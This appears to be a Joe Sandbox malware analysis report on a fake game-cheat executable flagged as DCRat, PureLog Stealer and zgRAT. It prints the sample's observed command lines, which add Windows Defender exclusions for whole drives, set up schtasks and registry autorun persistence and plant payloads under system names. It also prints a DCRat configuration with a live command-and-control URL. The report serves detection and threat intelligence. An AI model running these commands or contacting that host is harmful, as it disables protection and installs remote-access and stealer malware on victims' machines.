Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SAMP_CHEAT_ATVECHAU2.exe.bin.exe

Overview

General Information

Sample name:SAMP_CHEAT_ATVECHAU2.exe.bin.exe
Analysis ID:1590012
MD5:be4ae5e0b545e43608ae6a60ce297871
SHA1:ded512ee44ed38b7a6541b4e1d797387a27a5d93
SHA256:076c80010cb400aa03881eb5d88c6e2e4677c0d405255c48154bcf780e549533
Tags:DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Suspicious execution chain found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SAMP_CHEAT_ATVECHAU2.exe.bin.exe (PID: 5812 cmdline: "C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe" MD5: BE4AE5E0B545E43608AE6A60CE297871)
    • wscript.exe (PID: 4636 cmdline: "C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2584 cmdline: C:\Windows\system32\cmd.exe /c ""C:\msportComWin\5Jq5kgQebZBPc8KIFjklSaK6KtfwfF1rpT92XeRglY4x6Z5YYulxiLU9VV.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • BridgePortsurrogateserverref.exe (PID: 4340 cmdline: "C:\msportComWin/BridgePortsurrogateserverref.exe" MD5: 5F80A11E82CC7495CF5AD7DF3D052721)
          • csc.exe (PID: 4184 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 5452 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 344 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 3964 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6615.tmp" "c:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 344 cmdline: schtasks.exe /create /tn "jnowHpJlZlXalj" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6008 cmdline: schtasks.exe /create /tn "BridgePortsurrogateserverrefB" /sc MINUTE /mo 13 /tr "'C:\msportComWin\BridgePortsurrogateserverref.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • powershell.exe (PID: 1552 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 792 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2056 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3268 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1840 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/msportComWin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2156 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1964 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2168 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2092 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1732 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6008 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2060 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7176 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7212 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\jnowHpJlZlXal.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7248 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7272 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7308 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\jnowHpJlZlXal.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7340 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\services.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7376 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\BridgePortsurrogateserverref.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8224 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8944 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
  • jnowHpJlZlXal.exe (PID: 1652 cmdline: C:\msportComWin\jnowHpJlZlXal.exe MD5: 5F80A11E82CC7495CF5AD7DF3D052721)
  • jnowHpJlZlXal.exe (PID: 5928 cmdline: C:\msportComWin\jnowHpJlZlXal.exe MD5: 5F80A11E82CC7495CF5AD7DF3D052721)
  • services.exe (PID: 8536 cmdline: C:\Recovery\services.exe MD5: 5F80A11E82CC7495CF5AD7DF3D052721)
  • services.exe (PID: 8564 cmdline: C:\Recovery\services.exe MD5: 5F80A11E82CC7495CF5AD7DF3D052721)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn", "MUTEX": "DCR_MUTEX-CZP27witmtYUEWaffZeU", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SAMP_CHEAT_ATVECHAU2.exe.bin.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    SAMP_CHEAT_ATVECHAU2.exe.bin.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Recovery\services.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\services.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\msportComWin\BridgePortsurrogateserverref.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000003.1259094953.0000000006ACE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000000.00000003.1259921924.00000000073D7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      0000000A.00000000.1285212677.0000000000F12000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Process Memory Space: BridgePortsurrogateserverref.exe PID: 4340JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  10.0.BridgePortsurrogateserverref.exe.f10000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\msportComWin\BridgePortsurrogateserverref.exe, ProcessId: 4340, TargetFilename: C:\Recovery\services.exe
                                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\msportComWin/BridgePortsurrogateserverref.exe", ParentImage: C:\msportComWin\BridgePortsurrogateserverref.exe, ParentProcessId: 4340, ParentProcessName: BridgePortsurrogateserverref.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 1552, ProcessName: powershell.exe
                                    Sigma detected: System File Execution Location Anomaly
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\services.exe, CommandLine: C:\Recovery\services.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\services.exe, NewProcessName: C:\Recovery\services.exe, OriginalFileName: C:\Recovery\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Recovery\services.exe, ProcessId: 8536, ProcessName: services.exe
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\msportComWin\jnowHpJlZlXal.exe", EventID: 13, EventType: SetValue, Image: C:\msportComWin\BridgePortsurrogateserverref.exe, ProcessId: 4340, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jnowHpJlZlXal
                                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\msportComWin\jnowHpJlZlXal.exe", EventID: 13, EventType: SetValue, Image: C:\msportComWin\BridgePortsurrogateserverref.exe, ProcessId: 4340, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\msportComWin/BridgePortsurrogateserverref.exe", ParentImage: C:\msportComWin\BridgePortsurrogateserverref.exe, ParentProcessId: 4340, ParentProcessName: BridgePortsurrogateserverref.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline", ProcessId: 4184, ProcessName: csc.exe
                                    Sigma detected: Powershell Defender Exclusion
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\msportComWin/BridgePortsurrogateserverref.exe", ParentImage: C:\msportComWin\BridgePortsurrogateserverref.exe, ParentProcessId: 4340, ParentProcessName: BridgePortsurrogateserverref.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 1552, ProcessName: powershell.exe
                                    Sigma detected: Use Short Name Path in Command Line
                                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 4184, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP", ProcessId: 5452, ProcessName: cvtres.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe", ParentImage: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe, ParentProcessId: 5812, ParentProcessName: SAMP_CHEAT_ATVECHAU2.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe" , ProcessId: 4636, ProcessName: wscript.exe
                                    Sigma detected: Dynamic CSharp Compile Artefact
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\msportComWin\BridgePortsurrogateserverref.exe, ProcessId: 4340, TargetFilename: C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline
                                    Sigma detected: Non Interactive PowerShell Process Spawned
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\msportComWin/BridgePortsurrogateserverref.exe", ParentImage: C:\msportComWin\BridgePortsurrogateserverref.exe, ParentProcessId: 4340, ParentProcessName: BridgePortsurrogateserverref.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 1552, ProcessName: powershell.exe
                                    Sigma detected: Windows Processes Suspicious Parent Directory
                                    Source: Process startedAuthor: vburov: Data: Command: C:\Recovery\services.exe, CommandLine: C:\Recovery\services.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\services.exe, NewProcessName: C:\Recovery\services.exe, OriginalFileName: C:\Recovery\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Recovery\services.exe, ProcessId: 8536, ProcessName: services.exe

                                    Data Obfuscation

                                    barindex
                                    Sigma detected: Dot net compiler compiles file from suspicious location
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\msportComWin/BridgePortsurrogateserverref.exe", ParentImage: C:\msportComWin\BridgePortsurrogateserverref.exe, ParentProcessId: 4340, ParentProcessName: BridgePortsurrogateserverref.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline", ProcessId: 4184, ProcessName: csc.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-13T13:31:51.132803+010020480951A Network Trojan was detected192.168.2.749805104.21.32.180TCP
                                    2025-01-13T13:32:26.325209+010020480951A Network Trojan was detected192.168.2.749971104.21.32.180TCP
                                    2025-01-13T13:32:37.122225+010020480951A Network Trojan was detected192.168.2.749973104.21.32.180TCP
                                    2025-01-13T13:32:41.231727+010020480951A Network Trojan was detected192.168.2.749977104.21.32.180TCP
                                    2025-01-13T13:32:47.168578+010020480951A Network Trojan was detected192.168.2.749979104.21.32.180TCP
                                    2025-01-13T13:32:53.277113+010020480951A Network Trojan was detected192.168.2.749980104.21.32.180TCP
                                    2025-01-13T13:33:15.294345+010020480951A Network Trojan was detected192.168.2.749981104.21.32.180TCP
                                    2025-01-13T13:33:25.138184+010020480951A Network Trojan was detected192.168.2.749982104.21.32.180TCP
                                    2025-01-13T13:33:34.169521+010020480951A Network Trojan was detected192.168.2.749983104.21.32.180TCP
                                    2025-01-13T13:33:36.653982+010020480951A Network Trojan was detected192.168.2.749984104.21.32.180TCP
                                    2025-01-13T13:33:43.341431+010020480951A Network Trojan was detected192.168.2.749985104.21.32.180TCP
                                    2025-01-13T13:33:45.591524+010020480951A Network Trojan was detected192.168.2.749986104.21.32.180TCP
                                    2025-01-13T13:33:48.091522+010020480951A Network Trojan was detected192.168.2.749987104.21.32.180TCP
                                    2025-01-13T13:33:52.591564+010020480951A Network Trojan was detected192.168.2.749988104.21.32.180TCP
                                    2025-01-13T13:33:57.201064+010020480951A Network Trojan was detected192.168.2.749989104.21.32.180TCP
                                    2025-01-13T13:33:59.841721+010020480951A Network Trojan was detected192.168.2.749990104.21.32.180TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeAvira: detected
                                    Antivirus detection for dropped file
